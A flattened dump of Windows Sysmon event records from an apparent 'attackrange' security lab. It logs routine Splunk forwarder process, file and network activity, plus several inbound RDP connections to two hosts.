SERVICEtcpfalsefalse87.236.208.231-63501-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x8000000000000000979640Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:36.887{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59430-false10.0.1.12-8000- 23542300x8000000000000000979639Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:40.762{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C7B42C1A3844244DBC300EB2A386F84,SHA256=59E2F2A29D341C3331DFAD1E52BE44B10BBE1D079B0C65A2915B4532AE20D4DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050900Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:40.729{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CEBC41E983474EFD5CB5AEAA9DB550DC,SHA256=66F2FE1376185068724FA7645EE6DCBBCD2CBC858CA97ABDED2C284FAAC17F1F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050899Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:37.739{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53419-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000979641Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:41.840{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9A4FBFDA53363F5C771A44700243D3E,SHA256=C27D90601E0FF700571ADCC6A18C0BD9D0299CC26D7473EBE09752537B4F4CDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050901Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:41.760{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F1BB585ED719FAD1887CD81FF73B89E,SHA256=A58797C3BBAE1DE127359F76F783BC1F003F6F130190D05D1E05A782AA434E96,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050904Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:42.960{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB8719D48FCEEFDE0D4892CF7879DD62,SHA256=C56B7CE95CC9C455F4AB190EEDC3BAECFCF5D0B021D9B9BFD9E94F38C2A79552,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050903Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:39.992{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-63268-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050902Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:42.013{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DACBD4A9EEC3E9B2FCE7DA347649185B,SHA256=43C137C1F1E14A5CC1EBBA5613579D7F7E937E29FBDDD6D3908099DBFC9D2553,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050905Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:43.996{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A85CC79A23560D8AE7BB61183B983D6,SHA256=569E4500BC3048C28809DBDF76A16913E76E9638E90A45EF1065870412EE5DA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979642Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:43.058{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70AF10BFB074B7C4E7181EDE4B22E42E,SHA256=CAD8DA8B3E37FB265BD5CD47D6AFB60A3A35195F5C43995E0AC2622FE2580B48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979645Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:44.933{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D3399261D94FC24F3E666C726BF263DC,SHA256=3E50BE3ACA7663A2671A0738CD6B554A7255E0DE3639A64C9233531B8DF72891,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979644Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:44.933{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=287370D41BC80FD3A1369350AAB68942,SHA256=470F7854BCF008A3FF6FE10E0502665A90CBD60115F531582DF3310BF95E0D13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979643Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:44.292{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=313950BDCE14C1C2746ACB06C9B80F27,SHA256=49F0C1DA67BA3E2CA7BFFABBA1C28DCCB5D15978344EA33E925022ECC5B3A7D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050914Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:44.679{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8BC0-6151-4E7A-00000000FC01}2536C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050913Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:44.679{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050912Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:44.679{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050911Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:44.679{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050910Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:44.679{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050909Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:44.679{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8BC0-6151-4E7A-00000000FC01}2536C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050908Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:44.679{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8BC0-6151-4E7A-00000000FC01}2536C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050907Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:44.659{5EBD8912-8BC0-6151-4E7A-00000000FC01}2536C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050906Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:44.642{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=73D2B932669388AF780DE01770B33A0A,SHA256=3174D478A3A9CC124F244AF1D343E8AEEDAE007F398EB63524F11A6CF1B91C62,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979649Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:43.171{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54219-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000979648Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:42.839{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59431-false10.0.1.12-8000- 354300x8000000000000000979647Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:42.252{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com37552-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979646Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:45.526{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27674FD8ACC016D97736B9E242F6D4C1,SHA256=FBDC3FCDD342685E6A95CDF81DD09D3969A6B9396C1A836593B9D198E239F064,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050926Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:45.677{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=07F556F15B11D82E44E6F3DFAF4FE122,SHA256=5DF952A9128D8DE6B0E213F3D162C2F4C78E2B5551399B1533800BE2D345E050,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050925Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:45.378{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8BC1-6151-4F7A-00000000FC01}500C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050924Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:45.376{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050923Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:45.376{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050922Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:45.376{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050921Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:45.376{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050920Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:45.375{5EBD8912-7F2D-614D-0500-00000000FC01}408368C:\Windows\system32\csrss.exe{5EBD8912-8BC1-6151-4F7A-00000000FC01}500C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050919Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:45.375{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8BC1-6151-4F7A-00000000FC01}500C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050918Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:45.358{5EBD8912-8BC1-6151-4F7A-00000000FC01}500C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001050917Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:42.919{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53420-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001050916Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:42.845{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.115-52506-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050915Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:15:45.042{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BF417323BE87C396889BB2C7987E401,SHA256=514596CFD0DE82F405D3E4DFE8197EE6BDE2E15042C7BBD424F4D8058515FE03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979653Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:15:46.808{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D3399261D94FC24F3E666C726BF263DC,SHA256=3E50BE3ACA7663A2671A0738CD6B554A7255E0DE3639A64C9233531B8DF72891,IMPHASH=00000000000000000000000000000000falsetrue 